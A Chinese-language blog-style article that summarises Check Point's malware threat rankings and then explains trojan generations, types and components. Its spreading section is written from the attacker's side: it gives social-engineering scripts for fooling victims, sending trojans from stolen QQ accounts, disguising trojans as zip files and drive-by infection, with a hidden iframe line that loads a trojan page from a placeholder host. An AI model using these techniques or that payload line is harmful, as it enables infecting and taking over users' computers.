近期，一款名叫 FlawedAmmyy 的遠端訪問木馬（RTA），被列入了全球威脅指數的前 10 名。此前，Check Point 安全研究人員發現了多起分發 RAT 的活動，且其在今年 10 月有大幅增長的趨勢。儘管首次殺入前十（正好卡在第 10 名的位置），但其利用的惡意加密手段，讓我們無法對其放鬆警惕。

Check Point 指出，此類攻擊允許遠端控制受害者的機器，獲得對攝像頭和麥克風的完整訪問許可權、收集抓取螢幕資訊、竊取憑據和敏感檔案，以及其它侵入性監控受害者等行為。

過去幾月的趨勢得到了延續，挖礦惡意軟體 Coinhive 仍以 18% 的比例佔據全球威脅的首位，其次是 Cryptloot（佔 8%）。

然而針對使用者資料的惡意軟體數量表明，網路犯罪分子並未對使用者登陸憑證、敏感檔案、銀行/支付等資訊失去興趣。

排名第三的是 Dorkbot，作為一款基於 IRC 的蠕蟲病毒，其擁有移除程式碼執行的能力。第四名為製作粗糙的 Roughted 惡意軟體，其被用於傳輸大量的負載。

此外，Andromeda 後門允許控制著打造強大的殭屍網路，它與基於 JavaScript 的 Jsecoin 挖礦器分列第 5 和第 6 名。

排名第 10 的，正是本文介紹的 FlawedAmmyy RAT 。此外，Check Point 公佈了移動平臺的幾大威脅：

Android 模組化後門 Triada 已經登頂，取代了現已跌至第二名的 Android 網銀與資訊竊取木馬 Lokibot 。此外 Hiddad 重新迴歸了榜單（本月排名第三）。

之前的畢業設計，寫的就是關於木馬相關的，我這邊簡單做下普及：

木馬程式技術發展至今，已經經歷了四代：

第一代木馬只是簡單的密碼竊取，傳送等沒有什麼特別之處。

第二代木馬，在技術上有了很大的進步，冰河可以說是國內木馬的典型代表之一。

第三代木馬，在資料傳遞技術上，又做了不少的改進，出現了ICMP型別的木馬，利用畸形報文傳送資料，增加了查殺的難度。

第四代木馬，在程序的隱藏方面，採用了核心插入式的嵌入方式 ，利用遠端插入執行緒技術，嵌入DLL執行緒，或者掛接PSAPI，實現木馬的隱藏，甚至在windows NT/2000下，都能達到良好的隱藏效果。

總的來說木馬可以分為以下幾類：

1、遠端控制型木馬

這是現在最流行的木馬，每個人都想擁有這樣的木馬，因為他們可以控制別人的電腦就像控制自己的電腦一樣。灰鴿子就是此類木馬的佼佼者，它使用起來非常簡單，只需要某人執行伺服器，就可以對他的計算機有完全的訪問和控制權。

2、傳送密碼型木馬

這類木馬的目的是得到使用者的一些遊戲、QQ、銀行等賬號和密碼，然後利用這些獲得的賬號和密碼從事非法活動。絕大多數木馬都是透過asp收信和郵箱收信這兩種方式來獲取賬號和密碼的，現在網上很多人都在做這種非法的事，所以該類木馬的危害還是比較大的。

3、破壞性木馬

這種木馬唯一功能就是破壞和刪除檔案，非常簡單易用，他們能自動刪除受害人計算機上所有後綴名為DLL、EXE、INI檔案。這是非常危險的木馬，一旦被感染，又沒有及時清理，受害人的計算機資訊將不再存在。比如：硬碟炸彈，只要執行這個木馬，你的C盤的所有資料將毀於一旦。

4、FTP型木馬

這種木馬在你的電腦中開啟埠21，讓任何有FTP客戶軟體的人都可以不用密碼就能連線上你的電腦並自由上傳和下載，這是最常用的木馬，危險很大。

一個完整的木馬系統由硬體部分，軟體部分和具體連線部分組成。

1) 硬體部分：建立木馬連線所必須的硬體實體。控制端：對服務端進行遠端控制的一方。 服務端：被控制端遠端控制的一方。INTERNET：控制端對服務端進行遠端控制，資料傳輸的網路載體。

2) 軟體部分：實現遠端控制所必須的軟體程式。控制端程式：控制端用以遠端控制服務端的程式。木馬程式：潛入服務端內部，獲取其操作許可權的程式。木馬配置程式：設定木馬程式的埠號，觸發條件，木馬名稱等，使其在服務端藏得更隱蔽的程式。

3) 具體連線部分：透過INTERNET在服務端和控制端之間建立一條木馬通道所必須的元素。控制端IP，服務端IP：即控制端，服務端的網路地址，也是木馬進行資料傳輸的目的地。控制端埠，木馬埠：即控制端，服務端的資料入口，透過這個入口，資料可直達控制端程式或木馬程式。

用木馬這種駭客工具進行網路入侵，從過程上看大致可分為六步(具體可見圖2-1)，下面我們就按這六步來詳細闡述木馬的攻擊原理。

圖 2-1 木馬的攻擊原理

單單配置一個木馬是沒有用的，當我們配置完一個木馬的時候，我們就應該想到的是要怎麼才能將它傳播出去，讓別人點選它，讓點選的使用者成為我們所說的“肉雞”。但是這時候我們又再想怎麼才能讓對方輕易地去執行我們所傳送的木馬呢？這時候，我們考慮到如何偽裝我們的木馬，達到混淆別人的目的，所以這就要考驗我們對木馬偽裝的能力了。以下我們就來討論研究下，駭客是怎樣將木馬傳播出去的，怎麼對木馬進行偽裝。

1、捆綁欺騙

把木馬服務端和某個遊戲、圖片、電影、音樂等檔案捆綁成一個新的檔案在QQ、郵件、論壇上等地方傳送給別人或提供下載連結。當用戶接收到該捆綁檔案後，執行之後，能夠正常顯示該捆綁檔案中的正常檔案的內容，但是服務端已經悄悄地在使用者的後臺自動運行了。

此方法可用於對電腦安全意識比較薄弱的人，才可以起到很好的迷惑作用。

2、修改圖示欺騙

現在大多數有點水平的駭客在配置完木馬並測試後，再準備拿去傳播的時候，都會先重複下4.1步驟，然後再利用圖示替換等工具將木馬的圖示替換成能夠迷惑對方的圖示，比如他們可以將圖示改成HTML,TXT, ZIP等各種檔案的圖示,這是有相當大的迷惑性。

此方法可用於那些很少接觸電腦或是一個菜鳥級別的電腦使用者。

3、直接傳送

直接將木馬服務端發給對方，讓對方執行，對方執行後發現毫無反應（執行木馬後的典型表現，木馬自動銷燬），他就會問你說：“為什麼運行了那個程式後，那個程式卻消失了”。你可以這樣回答他：“是嗎，可能程式出錯了吧，沒事的，我再重新發個給你”，然後你就可以把正確的程式發給他，他收到後還可能跟你說聲謝謝呢，殊不知已經成為了你的“肉雞”了。

此方法可用於那些電腦沒有裝防毒軟體或沒有及時更新防毒軟體的使用者。

4、QQ冒名欺騙

你必須先擁有一個不屬於你自己的QQ號，這可能就需要你去盜取別人的號碼了（這個方法只是提下而已，請大家不要去嘗試，並不是鼓勵大家去盜號），然後你登入那個盜來號碼給他的好友們群發木馬程式，並加上一些容易讓人相信的文字讓對方去下載並執行，由於那些好友中肯定有一些信任被盜號碼的主人，他們就會毫不猶豫地下載並執行你發給他們的木馬程式，結果他們就中招了。

此方法可用於那些平時電腦不注意防毒，且沒有對QQ進行安全的密碼保護的使用者。

5、 郵件冒名欺騙

和4方法類似，用匿名郵件工具冒充好友或大型網站、機構單位向別人群發木馬附件，別人下載附件並執行的話就中木馬了。

此方法可用於那些隨便接受並開啟來路不明的郵件或將郵件的附件下載下來卻沒有防毒就執行的使用者。

6、上傳到入口網站讓人下載

由於大多數的入口網站都很少會對使用者上傳的檔案進行防毒或後門的檢測，這時候，我們就可以利用這個來進行木馬的傳播。首先我們先配置好一個木馬，然後在利用4.1和4.2提到的方法對木馬進行捆綁和圖示的修改，將木馬與正常的軟體捆綁在一起，並修改它的圖示，將它的名字改成那款正常軟體的名稱，最後，我們就可以將該木馬上傳到入口網站上，讓廣大的使用者下載了。

此方法主要是利用一些入口網站對使用者上傳的檔案沒有進行嚴格的審查，也利用那些去下載軟體的使用者的僥倖心理，因為他們一般覺得在入口網站下載的軟體都是綠色軟體，是沒有病毒的，這種僥倖心理恰恰受到駭客們的喜歡。

7、zip偽裝

這個方法其實很簡單，它主要是利用上面我們講過的4.1和4.2的內容。它的原理是將一個木馬和一個已損壞的zip包（可自制）捆綁在一起，然後將捆綁後的檔案的圖示改為zip圖示，這樣一來，除非比較細心的人看了他的字尾，否則點下去的效果將和一般損壞的zip沒什麼兩樣，根本不知道其實自己已經成為了別人的“肉雞”了。

8、網頁掛馬

　網頁掛馬就是攻擊者利用某網站存在的漏洞，進而利用該漏洞對該網站進行入侵，最終取得webshell。然後透過自己配置和經過除錯過的網馬的地址批次插入或指定插入某個頁面，從而達到掛馬的目的。常見的掛馬方式是框架嵌入式網路掛馬，其主要利用iframe語句，程式碼格式為：

<iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe>

當瀏覽者開啟剛網頁後，除了載入該網頁本身的內容後，還會載入攻擊者在該網頁上新增的這一句程式碼，這時瀏覽者的電腦就會悄悄的遠端下載該木馬並且執行，這時候如果該瀏覽者電腦上沒有防毒軟體或防毒軟體過期，那麼他將會在自己毫不知情的情況下成為了攻擊者的“肉雞“了。

該方法可以說是木馬傳播速度最快也是最為隱秘的手段了，大多數的駭客愛好者都是喜歡用這個方法來傳播木馬的，他們一般都熱衷於入侵那些有注入點或有漏洞的網站，取得它們的webshell後，進行批次掛馬。一般這些人他們的程式設計水平和資料庫的知識都是很有一定基礎的，如果他們將這些知識和經驗利用到安全領域的話，應該會有一番作為的。

此方法的運用範圍廣，所有用過電腦上網的人都有可能會中招，不過這也不是不能防範的，只要我們平時注意防毒軟體的更新，還有裝一些針對網頁掛馬的防護軟體，一般你不小心瀏覽到有掛馬的網站的時候，這些軟體就會提醒你該網頁可能存在網頁木馬資訊，提醒你不要去瀏覽，這樣我們就可以避免在瀏覽網頁的時候，在毫無之情的情況下成為了人家的“肉雞”了。